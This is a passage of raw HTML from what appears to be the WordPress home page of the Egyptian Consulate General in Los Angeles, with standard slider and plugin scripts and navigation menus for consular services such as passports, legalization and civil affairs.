src='http://egyconsulatela.com/wp-content/plugins/translatepress-multilingual/assets/js/trp-language-switcher.js?ver=1.2.2'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/netgo-expandablecollapsible-menu/include/script.js?ver=1.0'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/js/lib/modernizr.min.js?ver=2.0.15'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/js/lib/bootstrap.min.js?ver=2.0.15'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/js/jquery.touchSwipe.min.js?ver=2.0.15'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/js/lib/html5shiv.js?ver=2.0.15'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/js/lib/respond.min.js?ver=2.0.15'></script> <meta name="generator" content="Powered by LayerSlider 6.7.1 - Multi-Purpose, Responsive, Parallax, Mobile-Friendly Slider Plugin for WordPress." /> <!-- LayerSlider updates and docs at: https://layerslider.kreaturamedia.com --> <link rel='https://api.w.org/' href='http://egyconsulatela.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://egyconsulatela.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://egyconsulatela.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.9.10" /> <link rel="canonical" href="http://egyconsulatela.com/" /> <link rel='shortlink' href='http://egyconsulatela.com/' /> <link rel="alternate" type="application/json+oembed" href="http://egyconsulatela.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fegyconsulatela.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://egyconsulatela.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fegyconsulatela.com%2F&#038;format=xml" /> <meta name="generator" content="WPML ver:3.9.0 stt:5,1;" /> <meta name="generator" content="Give v2.1.1" /> <link rel="alternate" hreflang="en-US" href="http://egyconsulatela.com/"/><meta property="og:title" content="Home" /><meta property="og:url" content="http://egyconsulatela.com/" /><meta property="og:type" content="website" /><meta property="og:description" content="" /><style type="text/css">.broken_link, a.broken_link { text-decoration: line-through; }</style><meta name="generator" content="Powered by Slider Revolution 5.4.7.2 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /> <script type="text/javascript">function setREVStartSize(e){ try{ e.c=jQuery(e.c);var i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0; if(e.responsiveLevels&&(jQuery.each(e.responsiveLevels,function(e,f){f>i&&(t=r=f,l=e),i>f&&f>r&&(r=f,n=e)}),t>r&&(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h>1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length>0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length>1&&void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0&&(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&&f<e.minHeight&&(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f}) }catch(d){console.log("Failure at Presize of Slider:"+d)} };</script> <style type="text/css" id="wp-custom-css"> .rtl.header-3 .fw-site-navigation > ul > li { float: left; } </style> </head> <body class="home page-template page-template-visual-builder-template page-template-visual-builder-template-php page page-id-51 translatepress-en_US fw-full fw-website-align-center fw-section-space-md header-3 fw-top-bar-off fw-no-absolute-header fw-top-social-right search-in-menu mobile-menu-item-align-left fw-logo-image fw-logo-retina fw-animation-mobile-off" itemscope="itemscope" itemtype="https://schema.org/WebPage"> <div id="page" class="hfeed site"> <header class="fw-header" itemscope="itemscope" itemtype="https://schema.org/WPHeader"> <div class="fw-header-main"> <div class="fw-wrap-logo"> <div class="fw-container"> <a href="http://egyconsulatela.com/" class="fw-site-logo"> <img src="//egyconsulatela.com/wp-content/uploads/2018/04/Website-logo-the-01.png" alt="The Counslate General Of The Arab Republic Of Egypt In Los Angeles" /> </a> </div> </div> <div class="fw-nav-wrap" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement" role="navigation"> <div class="fw-container"> <a href="#mobile-menu" class="mmenu-link"><i class="fa fa-navicon"></i></a> <nav id="fw-menu-primary" class="fw-site-navigation primary-navigation"><ul id="menu-main-menu" class="fw-nav-menu"><li id="menu-item-840" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-has-icon menu-item-840"><a href="http://egyconsulatela.com" ><i class="fa fa-home"></i>HOME</a></li> <li id="menu-item-834" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-has-icon menu-item-834"><a href="#" ><i class="fa fa-flag"></i>THE CONSUL GENERAL</a> <ul class="sub-menu"> <li id="menu-item-989" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-989"><a href="http://egyconsulatela.com/curriculum-vitae/" >BIOGRAPHY</a></li> <li id="menu-item-1197" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1197"><a href="http://egyconsulatela.com/category/consulate-activities/" >ACTIVITIES</a></li> </ul> </li> <li id="menu-item-981" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-has-icon menu-item-981"><a href="#" ><i class="fa fa-line-chart"></i>THE CONSULATE</a> <ul class="sub-menu"> <li id="menu-item-979" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-979"><a href="http://egyconsulatela.com/category/news-announcements/" >NEWS &#038; ANNOUNCEMENTS</a></li> <li id="menu-item-1232" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1232"><a href="http://egyconsulatela.com/consular-team/" >CONSULAR TEAM</a></li> </ul> </li> <li id="menu-item-837" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-has-icon menu-item-837"><a href="#" ><i class="fa fa-bars"></i>CONSULAR SERVICE</a> <ul class="sub-menu"> <li id="menu-item-1233" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1233"><a href="#" >PASSPORTS</a> <ul class="sub-menu"> <li id="menu-item-1053" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1053"><a href="http://egyconsulatela.com/egyptian-passports/" >EGYPTIAN PASSPORTS</a></li> <li id="menu-item-1046" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1046"><a href="http://egyconsulatela.com/temporary-travel-document/" >TEMPORARY TRAVEL DOCUMENT</a></li> </ul> </li> <li id="menu-item-1234" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1234"><a href="#" >LEGALIZATION</a> <ul class="sub-menu"> <li id="menu-item-1009" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1009"><a href="http://egyconsulatela.com/power-of-attorney/" >POWER OF ATTORNEY</a></li> <li id="menu-item-1008" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1008"><a href="http://egyconsulatela.com/legalization-translation/" >LEGALIZATION &#038; TRANSLATION</a></li> <li id="menu-item-1007" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1007"><a href="http://egyconsulatela.com/commercial-legalization/" >COMMERCIAL LEGALIZATION</a></li> </ul> </li> <li id="menu-item-835" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-835"><a href="#" >CIVIL AFFAIRS</a> <ul class="sub-menu"> <li id="menu-item-1052" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1052"><a href="http://egyconsulatela.com/birth-certificate/" >BIRTH CERTIFICATE</a></li> <li id="menu-item-1051" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1051"><a href="http://egyconsulatela.com/death-certificate/" >DEATH CERTIFICATE</a></li> <li id="menu-item-1050" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1050"><a href="http://egyconsulatela.com/marriage-divorce/" >MARRIAGE &#038; DIVORCE</a></li> <li id="menu-item-1049" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1049"><a href="http://egyconsulatela.com/dual-citizenship/" >DUAL CITIZENSHIP</a></li> <li id="menu-item-1048" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1048"><a href="http://egyconsulatela.com/obtaining-egyptian-citizenship/" >OBTAINING EGYPTIAN CITIZENSHIP</a></li> <li id="menu-item-1238" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1238"><a href="http://egyconsulatela.com/death-abroad/" >DEATH ABROAD</a></li> <li id="menu-item-1325" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1325"><a href="http://egyconsulatela.com/criminal-records-background-check/" >CRIMINAL RECORDS/ BACKGROUND CHECK</a></li> </ul> </li> <li id="menu-item-1137" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1137"><a href="http://egyconsulatela.com/military/" >MILITARY</a></li> <li id="menu-item-1136" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1136"><a href="http://egyconsulatela.com/visas/" >VISAS</a></li> <li id="menu-item-1047" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1047"><a href="http://egyconsulatela.com/palestinian-travel-document/" >PALESTINIAN TRAVEL DOCUMENT</a></li> </ul> </li> <li id="menu-item-1149" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-icon menu-item-1149"><a href="http://egyconsulatela.com/category/about-egypt/" ><i class="fa fa-star"></i>ABOUT EGYPT</a></li> <li id="menu-item-72" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-icon menu-item-72"><a href="http://egyconsulatela.com/contact-us/" ><i class="fa fa-volume-control-phone"></i>CONTACT US</a></li> <li id="menu-item-wpml-ls-6-en" class="menu-item-language menu-item-language-current menu-item wpml-ls-slot-6 wpml-ls-item wpml-ls-item-en wpml-ls-current-language wpml-ls-menu-item wpml-ls-first-item wpml-ls-last-item menu-item-type-wpml_ls_menu_item menu-item-object-wpml_ls_menu_item menu-item-wpml-ls-6-en"><a href="http://egyconsulatela.com/" ><img class="wpml-ls-flag" src="http://egyconsulatela.com/wp-content/uploads/flags/Flag_of_the_United_States.svg" alt="en" title="English"></a></li> </ul></nav> <div class="fw-search fw-mini-search"> <a href="#" class="fw-search-icon"><i class="fa fa-search"></i></a> </div> </div> </div> </div> <div class="fw-wrap-search-form fw-form-search-full" role="search"> <form class="fw-search-form" method="get" action="http://egyconsulatela.com/"> <input type="text" name="s" class="fw-input-search" placeholder="Search"> <div class="fw-submit-wrap"></div> </form> </div> </header> <nav id="mobile-menu"><ul><li class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-has-icon"><a href="http://egyconsulatela.com">HOME</a></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-has-icon"><a href="#">THE CONSUL GENERAL</a><ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="http://egyconsulatela.com/curriculum-vitae/">BIOGRAPHY</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="http://egyconsulatela.com/category/consulate-activities/">ACTIVITIES</a></li></ul></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-has-icon"><a href="#">THE CONSULATE</a><ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="http://egyconsulatela.com/category/news-announcements/">NEWS &#038; ANNOUNCEMENTS</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="http://egyconsulatela.com/consular-team/">CONSULAR TEAM</a></li></ul></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-has-icon"><a href="#">CONSULAR SERVICE</a><ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children"><a href="#">PASSPORTS</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="http://egyconsulatela.com/egyptian-passports/">EGYPTIAN PASSPORTS</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="http://egyconsulatela.com/temporary-travel-document/">TEMPORARY TRAVEL DOCUMENT</a></li> </ul></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children"><a href="#">LEGALIZATION</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="http://egyconsulatela.com/power-of-attorney/">POWER OF ATTORNEY</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="http://egyconsulatela.com/legalization-translation/">LEGALIZATION &#038; TRANSLATION</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="http://egyconsulatela.com/commercial-legalization/">COMMERCIAL LEGALIZATION</a></li> </ul></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children"><a href="#">CIVIL AFFAIRS</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="http://egyconsulatela.com/birth-certificate/">BIRTH CERTIFICATE</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="http://egyconsulatela.com/death-certificate/">DEATH CERTIFICATE</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="http://egyconsulatela.com/marriage-divorce/">MARRIAGE &#038; DIVORCE</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="http://egyconsulatela.com/dual-citizenship/">DUAL CITIZENSHIP</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="http://egyconsulatela.com/obtaining-egyptian-citizenship/">OBTAINING EGYPTIAN CITIZENSHIP</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="http://egyconsulatela.com/death-abroad/">DEATH ABROAD</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="http://egyconsulatela.com/criminal-records-background-check/">CRIMINAL RECORDS/ BACKGROUND CHECK</a></li> </ul></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="http://egyconsulatela.com/military/">MILITARY</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="http://egyconsulatela.com/visas/">VISAS</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="http://egyconsulatela.com/palestinian-travel-document/">PALESTINIAN TRAVEL DOCUMENT</a></li></ul></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-icon"><a href="http://egyconsulatela.com/category/about-egypt/">ABOUT EGYPT</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-icon"><a href="http://egyconsulatela.com/contact-us/">CONTACT US</a></li><li class="menu-item-language menu-item-language-current menu-item wpml-ls-slot-6 wpml-ls-item wpml-ls-item-en wpml-ls-current-language wpml-ls-menu-item wpml-ls-first-item wpml-ls-last-item menu-item-type-wpml_ls_menu_item menu-item-object-wpml_ls_menu_item"><a href="http://egyconsulatela.com/"><img class="wpml-ls-flag" src="http://egyconsulatela.com/wp-content/uploads/flags/Flag_of_the_United_States.svg" alt="en" title="English"></a></li></ul></nav> <div id="main" class="site-main"> <div class="fw-page-builder-content"><section id="section-5cdd848f98251" class=" fw-main-row-custom fw-main-row-top fw-section-no-padding auto fw-section-position-back tf-sh-ceef63799c8388a0da5c725af9d2173f " style="background-color:#757575; " > <div class="fw-container-fluid" > <div class="fw-row"> <div id="column-5cdd848f98d66" class="fw-col-sm-12 tf-sh-dd0730becb64b50102f5aaa266f80f27 fw-col-no-padding" > <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> <div class="fw-text-box tf-sh-b5233c13f1c450cffd29d17c185252df " > <div class="fw-text-inner"> <p><link href="http://fonts.googleapis.com/css?family=Roboto:500%2C300%7COpen+Sans:600" rel="stylesheet" property="stylesheet" type="text/css" media="all"> <div id="rev_slider_1_1_wrapper" class="rev_slider_wrapper fullwidthbanner-container" data-source="gallery" style="margin:0px auto;background:transparent;padding:0px;margin-top:0px;margin-bottom:0px;"> <!-- START REVOLUTION SLIDER 5.4.7.2 fullwidth mode --> <div id="rev_slider_1_1" class="rev_slider fullwidthabanner" style="display:none;" data-version="5.4.7.2"> <ul> <!-- SLIDE --> <li data-index="rs-1" data-transition="fade" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="300" data-rotate="0" data-saveperformance="off" data-mediafilter="lark" data-title="Slide" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <!-- MAIN IMAGE --> <img src="http://egyconsulatela.com/wp-content/uploads/2018/04/Capture.jpg" alt="" title="Capture" width="1496" height="833" data-bgposition="center center" data-bgfit="cover" class="rev-slidebg" data-no-retina> <!-- LAYERS --> <!-- BACKGROUND VIDEO LAYER --> <div class="rs-background-video-layer" data-forcerewind="on" data-volume="mute" data-videowidth="100%" data-videoheight="100%" data-videomp4="http://hostallover.com/losangeles/wp-content/uploads/2018/04/egyptflagmoving23.mp4" data-videopreload="auto" data-videostartat="00:02" data-videoloop="loopandnoslidestop" data-aspectratio="16:9" data-autoplay="true" data-autoplayonlyfirsttime="false" ></div> <!-- LAYER NR. 1 --> <div class="tp-caption Instagram-Caption tp-resizeme" id="slide-1-layer-2" data-x="['center','center','center','center']" data-hoffset="['2','6','-2','3']" data-y="['middle','middle','middle','middle']" data-voffset="['-49','-60','-60','-28']" data-fontsize="['40','30','23','19']" data-lineheight="['40','35','25','20']" data-fontweight="['500','300','300','300']" data-width="['1039','962','774','474']" data-height="['none','none','153','none']" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":0,"split":"chars","splitdelay":0.05,"speed":2000,"split_direction":"forward","frame":"0","from":"y:[100%];z:0;rZ:-35deg;sX:1;sY:1;skX:0;skY:0;","mask":"x:0px;y:0px;s:inherit;e:inherit;","to":"o:1;","ease":"Power1.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['center','center','center','center']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 5; min-width: 1039px; max-width: 1039px; white-space: nowrap; font-size: 40px; line-height: 40px; font-weight: 500; color: #ffffff; letter-spacing: 1px;">"In Egypt, where the past and the future melt <br> in a timeless formula, and where history lives in <br> its natural habitat, we understood that without<br> Cherishing our past, we cannot navigate through <br>the future and we made sure that the appreciation<br> of our cultural heritage be our royal gate to <br>modernity." </div> <!-- LAYER NR. 2 --> <div class="tp-caption Photography-ImageHover tp-resizeme" id="slide-1-layer-3" data-x="['left','left','left','left']" data-hoffset="['808','640','472','305']" data-y="['top','top','top','top']" data-voffset="['371','293','234','207']" data-fontsize="['35','35','30','19']" data-fontweight="['200','200','100','200']" data-width="['none','none','229','none']" data-height="['none','none','27','none']" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":3050,"split":"chars","splitdelay":0.05,"speed":2000,"split_direction":"forward","frame":"0","from":"y:[100%];z:0;rZ:-35deg;sX:1;sY:1;skX:0;skY:0;","mask":"x:0px;y:0px;s:inherit;e:inherit;","to":"o:1;","ease":"Power4.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"},{"frame":"hover","speed":"1000","ease":"Power3.easeInOut","to":"o:0.5;sX:0.8;sY:0.8;rX:0;rY:0;rZ:0;z:0;","style":"c:rgb(255,255,255);"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 6; white-space: nowrap; font-size: 35px; line-height: 22px; font-weight: 200; color: #ffffff; letter-spacing: 0px;font-family:Arial;font-style:italic;">Lamia Mekhemar </div> <!-- LAYER NR. 3 --> <div class="tp-caption tp-shape tp-shapewrapper tp-resizeme" id="slide-1-layer-6" data-x="['left','left','left','left']" data-hoffset="['835','669','499','313']" data-y="['top','top','top','top']" data-voffset="['401','327','266','235']" data-width="['219','219','177','129']" data-height="['34','34','33','22']" data-whitespace="nowrap" data-type="shape" data-responsive_offset="on" data-frames='[{"delay":2260,"speed":1500,"frame":"0","from":"y:[-100%];z:0;rX:0deg;rY:0;rZ:0;sX:1;sY:1;skX:0;skY:0;","mask":"x:0px;y:0px;s:inherit;e:inherit;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 7;background:linear-gradient(315deg, rgba(255,219,76,1) 0%, rgba(255,205,2,1) 100%);"> </div> <!-- LAYER NR. 4 --> <div class="tp-caption tp-resizeme" id="slide-1-layer-5" data-x="['left','left','left','left']" data-hoffset="['852','688','515','322']" data-y="['top','top','top','top']" data-voffset="['405','332','270','233']" data-fontsize="['25','25','20','15']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":2430,"speed":2000,"frame":"0","from":"y:[100%];z:0;rX:0deg;rY:0;rZ:0;sX:1;sY:1;skX:0;skY:0;opacity:0;","mask":"x:0px;y:[100%];s:inherit;e:inherit;","to":"o:1;","ease":"Power2.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 8; white-space: nowrap; font-size: 25px; line-height: 22px; font-weight: 600; color: #000000; letter-spacing: 0px;font-family:Open Sans;">Consul General </div> </li> </ul> <div class="tp-bannertimer tp-bottom" style="visibility: hidden !important;"></div> </div> <script>var htmlDiv = document.getElementById("rs-plugin-settings-inline-css"); var htmlDivCss=".tp-caption.Instagram-Caption,.Instagram-Caption{color:rgba(255,255,255,1.00);font-size:20px;line-height:20px;font-weight:900;font-style:normal;font-family:Roboto;text-decoration:none;background-color:transparent;border-color:transparent;border-style:none;border-width:0px;border-radius:0px 0px 0px 0px}.tp-caption.Photography-ImageHover,.Photography-ImageHover{color:rgba(255,255,255,1.00);font-size:20px;line-height:22px;font-weight:400;font-style:normal;font-family:;text-decoration:none;background-color:transparent;border-color:rgba(255,255,255,0);border-style:none;border-width:0px;border-radius:0px 0px 0px 0px}.tp-caption.Photography-ImageHover:hover,.Photography-ImageHover:hover{color:rgba(255,255,255,1.00);text-decoration:none;background-color:transparent;border-color:transparent;border-style:none;border-width:0px;border-radius:0px 0px 0px 0px}"; if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; }else{ var htmlDiv = document.createElement("div"); htmlDiv.innerHTML = "<style>" + htmlDivCss + "</style>"; document.getElementsByTagName("head")[0].appendChild(htmlDiv.childNodes[0]); } </script> <script type="text/javascript"> if (setREVStartSize!==undefined) setREVStartSize( {c: '#rev_slider_1_1', responsiveLevels: [1240,1024,778,480], gridwidth: [1240,1024,778,480], gridheight: [550,400,400,300], sliderLayout: 'fullwidth'}); var revapi1, tpj; (function() { if (!/loaded|interactive|complete/.test(document.readyState)) document.addEventListener("DOMContentLoaded",onLoad); else onLoad(); function onLoad() { if (tpj===undefined) { tpj = jQuery; if("off" == "on") tpj.noConflict();} if(tpj("#rev_slider_1_1").revolution == undefined){ revslider_showDoubleJqueryError("#rev_slider_1_1"); }else{ revapi1 = tpj("#rev_slider_1_1").show().revolution({ sliderType:"standard", jsFileLocation:"//egyconsulatela.com/wp-content/plugins/revslider/public/assets/js/", sliderLayout:"fullwidth", dottedOverlay:"none", delay:9000, navigation: { onHoverStop:"off", }, responsiveLevels:[1240,1024,778,480], visibilityLevels:[1240,1024,778,480], gridwidth:[1240,1024,778,480], gridheight:[550,400,400,300], lazyType:"none", shadow:0, spinner:"spinner0", stopLoop:"off", stopAfterLoops:-1, stopAtSlide:-1, shuffle:"off", autoHeight:"off", disableProgressBar:"on", hideThumbsOnMobile:"off", hideSliderAtLimit:0, hideCaptionAtLimit:0, hideAllCaptionAtLilmit:0, debugMode:false, fallbacks: { simplifyAll:"off", nextSlideOnWindowFocus:"off", disableFocusListener:false, } }); }; /* END OF revapi call */ }; /* END OF ON LOAD FUNCTION */ }()); /* END OF WRAPPING FUNCTION */ </script> </div><!-- END REVOLUTION SLIDER --></p> </div> </div> </div> </div> </div></div> </div> </section><section id="section-5cdd8490344e2" class=" fw-main-row-custom fw-section-no-padding auto fw-section-position-back tf-sh-d3038c4b582217c0a04816fe6cb9e677 " style=" " > <div class="fw-container" > <div class="fw-row"> <div id="column-5cdd849034eab" class="fw-col-sm-12 tf-sh-cacb747f5fa7f48f20f26b934867c06f" > <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> <div class="fw-divider-space fw-custom-space fw-mobile-hide-element clearfix" style="height:27px;" ></div> </div> </div> </div></div> <div class="fw-row"> <div id="column-5cdd849035a4a" class="fw-col-sm-4 fw-col-md-3 tf-sh-aa6f903c66df69300829385f4c506527" > <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> <div class="fw-heading fw-heading-left tf-sh-71ce5f82fad424e85071cdf7e4a2a67b" > <h2 class="fw-special-title">THE<br> CONSULATE </h2> </div> </div> </div> </div><div id="column-5cdd84903644f" class="fw-col-sm-4 fw-col-md-3 tf-sh-4ba484e3109ded22e5ba45f9037b7e7e" > <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> <div class="fw-text-box tf-sh-2d60ecd4c684798724f6a7eea8b002ad help-steps" > <div class="fw-text-inner"> <p><img class="alignnone wp-image-1067" src="http://hostallover.com/losangeles/wp-content/uploads/2018/04/01-1.png" alt="" width="80" height="80" /><a href="http://egyconsulatela.com/category/consulate-activities/">Consulate Activities</a></p> </div> </div> </div> </div> </div><div id="column-5cdd849036d93" class="fw-col-sm-4 fw-col-md-3 tf-sh-ae8c19c666bd23af7ad6d0562ecde760" > <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> <div class="fw-text-box tf-sh-72cc85e59c1f43ea8250106b72260d8e help-steps" > <div class="fw-text-inner"> <p><img class="alignnone size-full wp-image-1068" src="http://hostallover.com/losangeles/wp-content/uploads/2018/04/02-1.png" alt="" width="80" height="80" /><a href="http://egyconsulatela.com/category/news-announcements/">Consulate Announcements</a></p> </div> </div> </div> </div> </div><div id="column-5cdd8490376ff" class="fw-tablet-hide-element fw-col-sm-3 tf-sh-395a67f16196f7ea2a560356b4636a19" > <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> <div class="fw-text-box tf-sh-7112a43f99ded6f3ebbaf9af9eda722a help-steps" > <div class="fw-text-inner"> <p><img class="alignnone size-full wp-image-1066" src="http://hostallover.com/losangeles/wp-content/uploads/2018/04/03-1-1.png" alt="" width="80" height="80" /><a href="http://egyconsulatela.com/category/news-announcements/">Consulate News</a></p> </div> </div> </div> </div> </div></div> <div class="fw-row"> <div id="column-5cdd849038340" class="fw-col-sm-12 tf-sh-cacb747f5fa7f48f20f26b934867c06f" > <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> <div class="fw-divider-space fw-custom-space fw-mobile-hide-element clearfix" style="height:16px;" ></div> </div> </div> </div></div> </div> </section><section id="section-5cdd849038e42" class=" fw-main-row-custom auto fw-section-position-back tf-sh-ba709e1c7e56e2f596c2522d61c561a9 " style=" " > <div class="fw-container" > <div class="fw-row"> <div id="column-5cdd84903971b" class="fw-col-sm-12 tf-sh-cacb747f5fa7f48f20f26b934867c06f" > <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> <div class="fw-heading fw-heading-left tf-sh-5fde47939c843f2c183ae3a05c3cb8b2" > <h2 class="fw-special-title">Consulate News & Updates</h2> </div> </div> </div> </div></div> <div class="fw-row"> <div id="column-5cdd84903a969" class="fw-col-sm-12 tf-sh-0cb9f45e2b31877faedfe936f5e8a929" > <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> <div class="fw-text-box tf-sh-4c5adb35153574a47f1630f4f716e932 " > <div class="fw-text-inner"> <p><span class="wprpsm-shortcode-preview"> <div class="wppsac-slick-slider-wrp wppsac-clearfix"> <div id="recent-post-slider-1" class="recent-post-slider design-2"> <div class="post-slides"> <div class="post-content-position"> <!-- Content-left/right --> <div class="post-content-left wp-medium-6 wpcolumns"> <div class="recentpost-inner-content"> <div class="recentpost-categories"> <ul class="post-categories wppsac-post-categories"><li><a href="http://egyconsulatela.com/category/about-egypt/" rel="category"> About Egypt </a></li><li><a href="http://egyconsulatela.com/category/all/" rel="category"> All Posts </a></li><li><a href="http://egyconsulatela.com/category/consulate-activities/" rel="category"> Consulate Activities </a></li><li><a href="http://egyconsulatela.com/category/all/events/" rel="category"> Events </a></li><li><a href="http://egyconsulatela.com/category/news-announcements/" rel="category"> News &amp; Announcements </a></li><li><a href="http://egyconsulatela.com/category/uncategorized/" rel="category"> Uncategorized </a></li></ul> </div> <h2 class="wp-post-title"> <a href="http://egyconsulatela.com/%d8%b1%d9%85%d8%b6%d8%a7%d9%86-%d9%83%d8%b1%d9%8a%d9%85-2/">رمضان 